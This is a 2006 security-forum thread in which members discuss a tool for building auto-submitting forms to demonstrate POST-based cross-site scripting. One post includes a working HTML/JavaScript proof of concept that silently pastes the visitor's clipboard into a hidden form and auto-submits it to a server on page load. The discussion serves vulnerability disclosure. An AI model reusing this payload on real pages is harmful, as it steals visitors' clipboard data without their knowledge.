Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Bug reports, feature enhancements or other complaints with the site, with us or just tell us what a miserable existance you have. No death threats or poetry please. Just kidding, no poetry please. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Disclosing POSTs
Posted by: maluc
Date: September 06, 2006 01:49AM

for the full disclosure section in particular, although useful everywhere.. a way to link to XSS that requires POST would be handy.

basically just a form builder, and yes i know its a bit of a pain to implement - and to prevent XSS of sla.ckers from :/

-maluc

Options: ReplyQuote
Re: Disclosing POSTs
Posted by: WhiteAcid
Date: September 06, 2006 04:49AM

Well... it took me a while but how about this:
http://www.whiteacid.org/misc/xss_post_forwarder.php
code is at: http://www.whiteacid.org/misc/xss_post_forwarder.phps

It can't handle radio buttons, and as you can see from the classes I'd made the classes support any input type but I hadn't bothered creating the way for users to supply what they want the user type to be. Still... is that what you meant?

Edit: yes, I realise that the referer on the target server will be mine, I don't really care.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 1 time(s). Last edit at 09/06/2006 05:00AM by WhiteAcid.

Options: ReplyQuote
Re: Disclosing POSTs
Posted by: rsnake
Date: September 06, 2006 10:29AM

Very cool WhiteAcid... That's a much easier implementation than I was originally thinking of building.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Disclosing POSTs
Posted by: WhiteAcid
Date: September 06, 2006 10:36AM

Out of curiosity, what was your approach?

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: Disclosing POSTs
Posted by: rsnake
Date: September 06, 2006 01:51PM

I was going to do some annoying dynamic JavaScript form builder. It was going to suck.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Disclosing POSTs
Posted by: WhiteAcid
Date: September 06, 2006 05:20PM

I've edited the script a bit. Should make more sense. After I actually used it to show a real XSS I found usability bugs. It now expects the target url in the xss_target variable, allows empty fields and is less cluttered.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: Disclosing POSTs
Posted by: kirke
Date: September 21, 2006 09:08AM

hmm, what's the advantage of this tool against Mozilla WebDeveloper extension?

Options: ReplyQuote
Re: Disclosing POSTs
Posted by: WhiteAcid
Date: September 21, 2006 09:21AM

Any browser can use this and it's easier to share the finds. Some of us (me included) don't use use that extension either.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: Disclosing POSTs
Posted by: rsnake
Date: September 21, 2006 10:20AM

I find it very useful, keep it up. but if I could make one suggestion it would be to include a textarea with the exploit code in it (including the automatic click event) so people don't have to code that part for themselves. Here's the HTML from http://ha.ckers.org/cutandpaste.html as an example:

<body onload="cutandpaste();">
<form method=post name=f action="cutandpaste.cgi">
<input type="submit" class="button" name="s" style="width=1px;height=1px">
<textarea maxlength=10000 name=clipb style="width=1px;height=1px"></textarea>
</form>
This only works in Internet Explorer. If you are using Firefox, or if you don't have anything in your clipboard this will be a pretty boring demo.
<script>
function cutandpaste() {
document.f.clipb.createTextRange().execCommand("Paste");
document.f.s.click();
}
</script>
</body>

The "document.f.s.click();" part is the part that's particularly interesting here.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Disclosing POSTs
Posted by: WhiteAcid
Date: September 21, 2006 11:42AM

Good suggestion. While it could be seen as encouraging exploitation as opposed to showing PoCs anyone who did want to exploit a flaw shows in the script will already know how to do it anyway so there's no extra harm in adding the textarea.
I've done it anway. Also I've extended the width of the input fields, which was really bugging me.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote


Sorry, only registered users may post in this forum.